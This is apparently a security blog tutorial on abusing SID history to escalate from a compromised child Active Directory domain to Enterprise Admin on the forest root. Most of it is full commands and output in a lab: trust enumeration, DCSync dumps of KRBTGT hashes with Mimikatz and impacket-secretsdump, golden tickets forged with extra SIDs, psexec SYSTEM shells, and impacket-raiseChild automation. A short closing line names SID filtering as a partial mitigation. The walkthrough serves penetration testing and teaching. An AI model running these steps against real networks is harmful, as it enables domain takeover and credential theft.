Every user account in a Windows domain has an associated Security Identifier (SID). When a user logs into a domain, their SID value is included in a users access token. This value is used for identity based security decisions.
Active Directory supports a feature called SID History which allows a single user account to have multiple associated SID values. This feature can be used when migrating users from a legacy domain to a new domain, and ensure they can still access resources in both domains.
Manipulating SID history requires domain administrator privileges in a target domain. If an adversary is able to compromise a child domain within a forest, SID history can be manipulated to gain administrative control of a parent domain.
Trust Enumeration
nltest.exe can be used to enumerate domain trusts. In the below output, we can see that a trust exists between bordergate.local (the forest root) and child.bordergate.local, a child domain.
1 2 3 4 5 | C:\Users\Administrator>nltest /domain_trustsList of domain trusts: 0: BORDERGATE bordergate.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest ) 1: CHILD child.bordergate.local (NT 5) (Forest: 0) (Primary Domain) (Native)The command completed successfully |
Domain trusts can also be enumerated using PowerShell;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | Get-ADTrust -Filter *Direction : BiDirectionalDisallowTransivity : FalseDistinguishedName : CN=bordergate.local,CN=System,DC=child,DC=bordergate,DC=localForestTransitive : FalseIntraForest : TrueIsTreeParent : FalseIsTreeRoot : FalseName : bordergate.localObjectClass : trustedDomainObjectGUID : 006fc34d-9cb6-4d0d-a7f8-6cdfe2fb9e33SelectiveAuthentication : FalseSIDFilteringForestAware : FalseSIDFilteringQuarantined : FalseSource : DC=child,DC=bordergate,DC=localTarget : bordergate.localTGTDelegation : FalseTrustAttributes : 32TrustedPolicy :TrustingPolicy :TrustType : UplevelUplevelOnly : FalseUsesAESKeys : FalseUsesRC4Encryption : False |
Exploiting SID History with Windows
Using a combination of PowerView and Mimikatz we can carry out a SID history attack using Windows. The following details need to be gathered;
- The FQDN’s of the child and parent domains
- The child and parent domain’s SID values
- The RC4 or AES hash of the child domain’s KRBTGT
FQDN Extraction with PowerView
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | PS C:\Users\Administrator\Desktop> . .\PowerView.ps1PS C:\Users\Administrator\Desktop> Get-NetDomainTrustSourceName : child.bordergate.localTargetName : bordergate.localTrustType : WINDOWS_ACTIVE_DIRECTORYTrustAttributes : WITHIN_FORESTTrustDirection : BidirectionalWhenCreated : 27/01/2024 11:03:26WhenChanged : 27/01/2024 11:03:26PS C:\Users\Administrator\Desktop> Get-NetForestDomainForest : bordergate.localDomainControllers : {DC01.bordergate.local}Children : {child.bordergate.local}DomainMode : UnknownDomainModeLevel : 7Parent :PdcRoleOwner : DC01.bordergate.localRidRoleOwner : DC01.bordergate.localInfrastructureRoleOwner : DC01.bordergate.localName : bordergate.localForest : bordergate.localDomainControllers : {CDC01.child.bordergate.local}Children : {}DomainMode : UnknownDomainModeLevel : 7Parent : bordergate.localPdcRoleOwner : CDC01.child.bordergate.localRidRoleOwner : CDC01.child.bordergate.localInfrastructureRoleOwner : CDC01.child.bordergate.localName : child.bordergate.local |
Determining the Parent and Child Domain SID’s
PowerView’s Get-DomainSID can be used for this purpose.
1 2 3 4 | PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain child.bordergate.localS-1-5-21-3282285589-3699175333-1759823265PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain bordergate.localS-1-5-21-678665010-2561942565-514098031 |
KRBTGT Extraction with Mimikatz
We can extract the KRBTGT of the child domain using the following Mimikatz one liner.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 | mimikatz.exe "privilege::debug" "lsadump::dcsync /user:CHILD\krbtgt" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debugPrivilege '20' OKmimikatz(commandline) # lsadump::dcsync /user:CHILD\krbtgt[DC] 'child.bordergate.local' will be the domain[DC] 'CDC01.child.bordergate.local' will be the DC server[DC] 'CHILD\krbtgt' will be the user account[rpc] Service : ldap[rpc] AuthnSvc : GSS_NEGOTIATE (9)Object RDN : krbtgt** SAM ACCOUNT **SAM Username : krbtgtAccount Type : 30000000 ( USER_OBJECT )User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )Account expiration :Password last change : 27/01/2024 11:04:06Object Security ID : S-1-5-21-3282285589-3699175333-1759823265-502Object Relative ID : 502Credentials: Hash NTLM: b3a2319d94fe4aeae0f1fd5b017eed82 ntlm- 0: b3a2319d94fe4aeae0f1fd5b017eed82 lm - 0: 572c05076819c0d36b6d2e30b8b7f5b3Supplemental Credentials:* Primary:NTLM-Strong-NTOWF * Random Value : 92aa3fc70fca259306071a788a8c48c2mimikatz(commandline) # exitBye! |
Carrying out the Attack
At this point, we have collected the following details;
| Requirement | Value |
| Parent domain FQDN | bordergate.local |
| Child domain FQDN | child.bordergate.local |
| Parent domain SID | S-1-5-21-678665010-2561942565-514098031 |
| Child domain SID | S-1-5-21-3282285589-3699175333-1759823265 |
| Child domain KRBTGT RC4 | b3a2319d94fe4aeae0f1fd5b017eed82 |
We will need to know the enterprise administrator SID, but since the RID is a well known value (519) we can just append with to the parent domain SID; S-1-5-21-678665010-2561942565-514098031-519
We then use Mimikatz to generate a golden ticket with the parent domain’s Enterprise Administrator SID as part of it’s SID history.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$Access is denied.C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /pttUser : AdministratorDomain : child.bordergate.local (CHILD)SID : S-1-5-21-3282285589-3699175333-1759823265User Id : 500Groups Id : *513 512 520 518 519Extra SIDs: S-1-5-21-678665010-2561942565-514098031-519 ;ServiceKey: b3a2319d94fe4aeae0f1fd5b017eed82 - rc4_hmac_ntLifetime : 27/01/2024 14:26:25 ; 24/01/2034 14:26:25 ; 24/01/2034 14:26:25-> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generatedGolden ticket for 'Administrator @ child.bordergate.local' successfully submitted for current sessionmimikatz(commandline) # exitBye!C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$ Volume in drive \\DC01.bordergate.local\C$ has no label. Volume Serial Number is 2CAB-3D22 Directory of \\DC01.bordergate.local\C$08/05/2021 08:20 <DIR> PerfLogs27/01/2024 09:30 <DIR> Program Files08/05/2021 09:40 <DIR> Program Files (x86)27/01/2024 09:23 <DIR> Users27/01/2024 13:57 <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 40,117,248,000 bytes free |
Attacking with Linux
The same attack can also be launched from a Linux system;
Determining the Parent and Child Domain SID’s
1 2 3 4 5 6 | └─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.205 | grep "Domain SID"[*] Domain SID is: S-1-5-21-678665010-2561942565-514098031 ┌──(kali㉿kali)-[~/forest-trust-tools]└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.240 | grep "Domain SID"[*] Domain SID is: S-1-5-21-3282285589-3699175333-1759823265 |
KRBTGT Extraction with Impacket-secretsdump
1 2 3 4 5 6 7 8 9 10 11 | impacket-secretsdump CHILD/Alice:Password1@192.168.1.240 -just-dc-user CHILD/krbtgtImpacket v0.11.0 - Copyright 2023 Fortra[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretskrbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::[*] Kerberos keys grabbedkrbtgt:aes256-cts-hmac-sha1-96:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93krbtgt:aes128-cts-hmac-sha1-96:10270f335d0d6b548e1842ea0e6733c6krbtgt:des-cbc-md5:0d640e94da8c4915[*] Cleaning up... |
Carrying out the Attack
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 | ┌──(kali㉿kali)-[~]└─$ impacket-ticketer -nthash b3a2319d94fe4aeae0f1fd5b017eed82 -domain child.bordergate.local -domain-sid S-1-5-21-3282285589-3699175333-1759823265 -extra-sid S-1-5-21-678665010-2561942565-514098031-519 AdministratorImpacket v0.11.0 - Copyright 2023 Fortra[*] Creating basic skeleton ticket and PAC Infos[*] Customizing ticket for child.bordergate.local/Administrator[*] PAC_LOGON_INFO[*] PAC_CLIENT_INFO_TYPE[*] EncTicketPart[*] EncAsRepPart[*] Signing/Encrypting final ticket[*] PAC_SERVER_CHECKSUM[*] PAC_PRIVSVR_CHECKSUM[*] EncTicketPart[*] EncASRepPart[*] Saving ticket in Administrator.ccache ┌──(kali㉿kali)-[~]└─$ export KRB5CCNAME=Administrator.ccache ┌──(kali㉿kali)-[~]└─$ klistTicket cache: FILE:Administrator.ccacheDefault principal: Administrator@CHILD.BORDERGATE.LOCALValid starting Expires Service principal27/01/24 15:02:23 24/01/34 15:02:23 krbtgt/CHILD.BORDERGATE.LOCAL@CHILD.BORDERGATE.LOCAL renew until 24/01/34 15:02:23┌──(kali㉿kali)-[~]└─$ impacket-psexec CHILD.bordergate.local/Administrator@dc01.bordergate.local -k -no-passImpacket v0.11.0 - Copyright 2023 Fortra[*] Requesting shares on dc01.bordergate.local.....[*] Found writable share ADMIN$[*] Uploading file pijDaCeK.exe[*] Opening SVCManager on dc01.bordergate.local.....[*] Creating service PYVP on dc01.bordergate.local.....[*] Starting service PYVP.....[!] Press help for extra shell commandsMicrosoft Windows [Version 10.0.20348.587](c) Microsoft Corporation. All rights reserved.C:\Windows\system32> |
Note: When using impacket-psexec it’s import to use the Domain FQDN for the user or you will likely receive the following error: “[-] [Errno Connection error (CHILD:88)] [Errno -3] Temporary failure in name resolution”
Automated Exploitation
impacket-raiseChild is an impacket script that can be used to automatically gather the required details and gain command execution on the parent domain controller;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | impacket-raiseChild -target-exec 192.168.1.205 child.bordergate.local/alice:'Password1'Impacket v0.11.0 - Copyright 2023 Fortra[*] Raising child domain child.bordergate.local[*] Forest FQDN is: bordergate.local[*] Raising child.bordergate.local to bordergate.local[*] bordergate.local Enterprise Admin SID is: S-1-5-21-678665010-2561942565-514098031-519[*] Getting credentials for child.bordergate.localchild.bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::child.bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93[*] Getting credentials for bordergate.localbordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:48aae46c1e41eca204a6aa70a6aedd48:::bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:2b52d519771b9b1266342151af0cc8e646d66d4a6baa59c2d443f4445b6acf0f[*] Target User account name is Administratorbordergate.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::bordergate.local/Administrator:aes256-cts-hmac-sha1-96s:bb9930dc9a2266e2491cdb468d6eb7441d87053fd483b8ff2473545fc71b3482[*] Opening PSEXEC shell at DC01.bordergate.local[*] Requesting shares on DC01.bordergate.local.....[*] Found writable share ADMIN$[*] Uploading file qdrQNfow.exe[*] Opening SVCManager on DC01.bordergate.local.....[*] Creating service pWac on DC01.bordergate.local.....[*] Starting service pWac.....[!] Press help for extra shell commandsMicrosoft Windows [Version 10.0.20348.587](c) Microsoft Corporation. All rights reserved.C:\Windows\system32>hostnameDC01C:\Windows\system32>whoamint authority\system |
In Conclusion
Domains are not intended to be a security boundary, and there are numerous other ways to perform escalation from a child domain. Enabling a feature called “SID Filtering” would partly mitigate this attack. This prevents SID values from other domains being used.